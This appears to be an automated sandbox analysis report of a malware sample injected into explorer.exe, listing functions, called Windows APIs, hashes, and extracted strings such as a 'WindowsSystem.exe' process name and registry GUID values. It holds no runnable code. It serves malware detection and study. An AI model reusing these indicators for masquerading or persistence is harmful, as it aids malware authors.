                                                                                                            • Opcode ID: a466164d332dd90d406ca9b58455ee3c3e4c71f87633efd298baad6cbfeeeaef
                                                                                                            • Instruction ID: 7ad4d69da664cbe588501a97ac8f83f3b12c71a5583a3601d034ce51e77beb86
                                                                                                            • Opcode Fuzzy Hash: a466164d332dd90d406ca9b58455ee3c3e4c71f87633efd298baad6cbfeeeaef
                                                                                                            • Instruction Fuzzy Hash: EA5103313007B082EB28DB35B82979B7391FB89784F44652AEE9A63B54CF3DC606C704
                                                                                                            Function 00E31848 Relevance: 107.7, APIs: 86, Instructions: 180COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: free$ErrorFreeHeapLast_errno
                                                                                                            • String ID:
                                                                                                            • API String ID: 1012874770-0
                                                                                                            • Opcode ID: 4a89303ada8976f5ba6e723fc5dc129f4762e2132d56d8738a2842697157dd51
                                                                                                            • Instruction ID: c7a3381d720f24ad4de2929364b43da054f403c019e11addbf263a666bd641e0
                                                                                                            • Opcode Fuzzy Hash: 4a89303ada8976f5ba6e723fc5dc129f4762e2132d56d8738a2842697157dd51
                                                                                                            • Instruction Fuzzy Hash: F981682229155881DB41FF31ECB52BF2360EBE4F4CF146172AE6D6B12ECEA0D84583D0
                                                                                                            Function 00E0F850 Relevance: 33.3, APIs: 14, Strings: 5, Instructions: 95memoryprocessstringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00E0F510: SHGetKnownFolderPath.SHELL32 ref: 00E0F587
                                                                                                              • Part of subcall function 00E0F510: lstrlenW.KERNEL32 ref: 00E0F59A
                                                                                                              • Part of subcall function 00E0F510: lstrlenW.KERNEL32 ref: 00E0F5B5
                                                                                                              • Part of subcall function 00E0F510: LocalAlloc.KERNEL32 ref: 00E0F5DC
                                                                                                              • Part of subcall function 00E0F510: lstrlenW.KERNEL32 ref: 00E0F620
                                                                                                              • Part of subcall function 00E0F510: CoTaskMemFree.COMBASE ref: 00E0F635
                                                                                                            • LocalAlloc.KERNEL32 ref: 00E0F88C
                                                                                                            • LocalFree.KERNEL32 ref: 00E0FA3D
                                                                                                              • Part of subcall function 00E28378: _errno.LIBCMT ref: 00E283AF
                                                                                                              • Part of subcall function 00E28378: _invalid_parameter_noinfo.LIBCMT ref: 00E283BA
                                                                                                            • LocalAlloc.KERNEL32 ref: 00E0F8D4
                                                                                                            • GetModuleFileNameW.KERNEL32 ref: 00E0F8F8
                                                                                                            • lstrcmpiW.KERNEL32 ref: 00E0F910
                                                                                                            • LocalAlloc.KERNEL32 ref: 00E0F928
                                                                                                            • CreateProcessW.KERNEL32 ref: 00E0F9D9
                                                                                                            • LocalFree.KERNEL32 ref: 00E0F9E9
                                                                                                            • LocalFree.KERNEL32 ref: 00E0F9F4
                                                                                                            • LocalFree.KERNEL32 ref: 00E0F9FF
                                                                                                            • LocalFree.KERNEL32 ref: 00E0FA0A
                                                                                                            • LocalFree.KERNEL32 ref: 00E0FA1C
                                                                                                            • LocalFree.KERNEL32 ref: 00E0FA27
                                                                                                            • LocalFree.KERNEL32 ref: 00E0FA32
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$Free$Alloc$lstrlen$CreateFileFolderKnownModuleNamePathProcessTask_errno_invalid_parameter_noinfolstrcmpi
                                                                                                            • String ID: "%s%s" %s$%s%s$WindowsSystem.exe$h${A3956157-6EDC-4743-A7B9-FF7CDC2529A9}
                                                                                                            • API String ID: 2909854553-3939194678
                                                                                                            • Opcode ID: 4d25641b8735d14a726654b48d45073a7de7170b3c13ab805fafb7f8c1a648b6
                                                                                                            • Instruction ID: 24aa72ef65848b2c44f69b811ff3822192e709161102f59b3c8faa1c2fa34e41
                                                                                                            • Opcode Fuzzy Hash: 4d25641b8735d14a726654b48d45073a7de7170b3c13ab805fafb7f8c1a648b6
                                                                                                            • Instruction Fuzzy Hash: 84510832218B8082E7209F25F95435AB7A1F7C4784F601536EA8E93BB8DF7DD599CB00
                                                                                                            Function 00E238A0 Relevance: 25.6, APIs: 17, Instructions: 138networkmemoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$CloseFreeHandle$Event$AllocCreateEventsMultipleSelectWaitund_memcpy
                                                                                                            • String ID:
                                                                                                            • API String ID: 3749125693-0
                                                                                                            • Opcode ID: 124c21bda427232cf7733cdd1a376e2e28e0464f34ccb17ebe09ad098ab10e4f
                                                                                                            • Instruction ID: cd6cc5c94f16ec3231b01b23928f6e6b3360f4920f00d3320b6b67c74fc4a865
                                                                                                            • Opcode Fuzzy Hash: 124c21bda427232cf7733cdd1a376e2e28e0464f34ccb17ebe09ad098ab10e4f
                                                                                                            • Instruction Fuzzy Hash: A561D236218A908BD760CF29F59471AB7A0F7C5B94F106116EA8A93B68CF7EC845CF00
                                                                                                            Function 00E018F0 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 115processmemorysynchronizationCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$Free$CloseHandle$AllocCreateDirectoryObjectProcessSingleSystemWaitlstrlen
                                                                                                            • String ID: h
                                                                                                            • API String ID: 1515568942-2439710439
                                                                                                            • Opcode ID: 700ef754703000de30a9d05d8f56da3ac2eebbd87ca9f8f65ca9b3787f479bf4
                                                                                                            • Instruction ID: 1d4398b15b31b17bfbbb40de9082e3d437193166d53a22a1299278f04a99918a
                                                                                                            • Opcode Fuzzy Hash: 700ef754703000de30a9d05d8f56da3ac2eebbd87ca9f8f65ca9b3787f479bf4
                                                                                                            • Instruction Fuzzy Hash: 8F51F872218BC086E7708B14F49839AB3A1F788798F901626D7D997BA9DF7DC584CB04
                                                                                                            Function 00E138E0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 69memoryprocessCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LocalAlloc.KERNEL32 ref: 00E138F6
                                                                                                            • GetSystemDirectoryW.KERNEL32 ref: 00E13917
                                                                                                            • LocalAlloc.KERNEL32 ref: 00E1392F
                                                                                                              • Part of subcall function 00E17DA0: lstrlenW.KERNEL32 ref: 00E17DEC
                                                                                                              • Part of subcall function 00E28378: _errno.LIBCMT ref: 00E283AF
                                                                                                              • Part of subcall function 00E28378: _invalid_parameter_noinfo.LIBCMT ref: 00E283BA
                                                                                                            • CreateProcessW.KERNEL32 ref: 00E13A0E
                                                                                                            • LocalFree.KERNEL32 ref: 00E13A1E
                                                                                                            • LocalFree.KERNEL32 ref: 00E13A29
                                                                                                            • LocalFree.KERNEL32 ref: 00E13A3B
                                                                                                            • LocalFree.KERNEL32 ref: 00E13A46
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$Free$Alloc$CreateDirectoryProcessSystem_errno_invalid_parameter_noinfolstrlen
                                                                                                            • String ID: h
                                                                                                            • API String ID: 1407737935-2439710439
                                                                                                            • Opcode ID: 68ab8b961d4bc71c5f4e552a72eee95bdcf9ccaadb9cae7aedff49765960be32
                                                                                                            • Instruction ID: 33883ed6ac81fd836da8fb98c61cc9fc4e1138664e2fea29a8ac77c0d23fb98d
                                                                                                            • Opcode Fuzzy Hash: 68ab8b961d4bc71c5f4e552a72eee95bdcf9ccaadb9cae7aedff49765960be32
                                                                                                            • Instruction Fuzzy Hash: 6C313C32218AC082E7609F61F49479FB7A1F7C4794F501526EAC997B68DFBDC549CB00
                                                                                                            Function 00E07840 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 51registrystringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetModuleFileNameW.KERNEL32 ref: 00E0786E
                                                                                                              • Part of subcall function 00E28378: _errno.LIBCMT ref: 00E283AF
                                                                                                              • Part of subcall function 00E28378: _invalid_parameter_noinfo.LIBCMT ref: 00E283BA
                                                                                                            • RegOpenKeyW.ADVAPI32 ref: 00E078B3
                                                                                                            • lstrlenW.KERNEL32 ref: 00E078C2
                                                                                                            • RegSetValueExW.ADVAPI32 ref: 00E078F5
                                                                                                            • RegCloseKey.ADVAPI32 ref: 00E07907
                                                                                                            • RegCloseKey.ADVAPI32 ref: 00E0791C
                                                                                                            Strings
                                                                                                            • {BB52E685-57DB-490D-A4DD-CCF2F7D90D58}, xrefs: 00E0787C
                                                                                                            • SOFTWARE\%s, xrefs: 00E07883
                                                                                                            • {C3120582-398C-4F3B-A956-7E9F9DB9EF8E}, xrefs: 00E078E6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Close$FileModuleNameOpenValue_errno_invalid_parameter_noinfolstrlen
                                                                                                            • String ID: SOFTWARE\%s${BB52E685-57DB-490D-A4DD-CCF2F7D90D58}${C3120582-398C-4F3B-A956-7E9F9DB9EF8E}
                                                                                                            • API String ID: 3731830441-3858757917
                                                                                                            • Opcode ID: 7bb07a2271345102e521609267ec7056a74e37406b2e27a2aab72c2f972f2200
                                                                                                            • Instruction ID: 7316cb814d3f9c3582848e65b2f7e47eb4ce80c978657bf05b21e6e68041ff0f
                                                                                                            • Opcode Fuzzy Hash: 7bb07a2271345102e521609267ec7056a74e37406b2e27a2aab72c2f972f2200
                                                                                                            • Instruction Fuzzy Hash: C7113361328AC092DB20DB25FD8879A6360FBE47C5F805922DA9E936A8DF7DC645C704
                                                                                                            Function 00E2B85C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 143COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • _getptd.LIBCMT ref: 00E2B88D
                                                                                                              • Part of subcall function 00E2AC68: _amsg_exit.LIBCMT ref: 00E2AC7E
                                                                                                            • _getptd.LIBCMT ref: 00E2B8AB
                                                                                                            • _CallSETranslator.LIBCMT ref: 00E2B8F3
                                                                                                              • Part of subcall function 00E28788: _getptd.LIBCMT ref: 00E287AF
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _getptd$CallTranslator_amsg_exit
                                                                                                            • String ID: MOC$RCC
                                                                                                            • API String ID: 1374396951-2084237596
                                                                                                            • Opcode ID: a0a0505cb22886c3b0ba542797d601f8fd46d35cc16e9fcaff9154a5669b2d24
                                                                                                            • Instruction ID: 7d5252b5a4039430768fefde6d8951124e73e95b2ab365746bf8053f61973621
                                                                                                            • Opcode Fuzzy Hash: a0a0505cb22886c3b0ba542797d601f8fd46d35cc16e9fcaff9154a5669b2d24
                                                                                                            • Instruction Fuzzy Hash: 6351BE72604AE496CF20DF15F1907ADB3A0FBC1B88F596626EB9E67618DF78C191C700
                                                                                                            Function 00E258F0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34libraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressLibraryLoadProcVersion
                                                                                                            • String ID: NTDLL.DLL$RtlGetVersion
                                                                                                            • API String ID: 2685220120-196638859
                                                                                                            • Opcode ID: 42daa815b2a7eb0b21278584d862c4cfba6597e56c53cd9aa9c348133628d252
                                                                                                            • Instruction ID: 7d97ce7ac3e408962118177389f58902f5878336114585413b63af04b380c487
                                                                                                            • Opcode Fuzzy Hash: 42daa815b2a7eb0b21278584d862c4cfba6597e56c53cd9aa9c348133628d252
                                                                                                            • Instruction Fuzzy Hash: F2114C36228B94C2E764DF10F94839AB7B0F3C8794F401925AA8E57768DF3CC688CB00
                                                                                                            Function 00E04050 Relevance: 7.5, APIs: 5, Instructions: 44threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Create$CloseEventHandle$Thread
                                                                                                            • String ID:
                                                                                                            • API String ID: 3315681087-0
                                                                                                            • Opcode ID: 75d140b14a8b61b3ac78a521865084d2b42c1e628267827f94a05f541de129ef
                                                                                                            • Instruction ID: 8791bd27ff6c703c250612993d09f055e5def297e2acd588637a17f1d1f70607
                                                                                                            • Opcode Fuzzy Hash: 75d140b14a8b61b3ac78a521865084d2b42c1e628267827f94a05f541de129ef
                                                                                                            • Instruction Fuzzy Hash: 6F21F1B4611B80C2F7649B20FA6975637A0F374389F106925C945B26E4CF7E84D4C741
                                                                                                            Function 00E3404C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _errno_fltout2_invalid_parameter_noinfo
                                                                                                            • String ID: -
                                                                                                            • API String ID: 485257318-2547889144
                                                                                                            • Opcode ID: f71b6384175b464f91dd1cf97e559d4d32636d652ffd11b7722b2513aca7f18f
                                                                                                            • Instruction ID: 210e526c68fabb7d163abac5295d9865ed3582a81281015de1b3923236e2bb96
                                                                                                            • Opcode Fuzzy Hash: f71b6384175b464f91dd1cf97e559d4d32636d652ffd11b7722b2513aca7f18f
                                                                                                            • Instruction Fuzzy Hash: BF315C62305B8486DB219F25F80875ABBA0E795BD8F146222EF9817BD9DF3DD485CB00
                                                                                                            Function 00E328B4 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • _lock.LIBCMT ref: 00E328C8
                                                                                                              • Part of subcall function 00E30B64: _amsg_exit.LIBCMT ref: 00E30B8E
                                                                                                            • fclose.LIBCMT ref: 00E328F8
                                                                                                            • DeleteCriticalSection.KERNEL32(?,?,?,?,?,00E30227), ref: 00E3291C
                                                                                                            • free.LIBCMT ref: 00E3292D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CriticalDeleteSection_amsg_exit_lockfclosefree
                                                                                                            • String ID:
                                                                                                            • API String ID: 594724896-0
                                                                                                            • Opcode ID: 78b2622f5411a723218518f8bc3c4c94124d5cfbb3948ed22ac017eabad8ec1a
                                                                                                            • Instruction ID: 23f21a677d508cbec70eddd1103575cdeae1f084aba44be5e71237a85ed5f1ac
                                                                                                            • Opcode Fuzzy Hash: 78b2622f5411a723218518f8bc3c4c94124d5cfbb3948ed22ac017eabad8ec1a
                                                                                                            • Instruction Fuzzy Hash: FB117036610B8482D710DB19F89832DBBA0F7D4B98F259619DBDA67774CF35C852CB04
                                                                                                            Function 00E01860 Relevance: 6.0, APIs: 4, Instructions: 21synchronizationCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle$EventObjectSingleWait
                                                                                                            • String ID:
                                                                                                            • API String ID: 2857295742-0
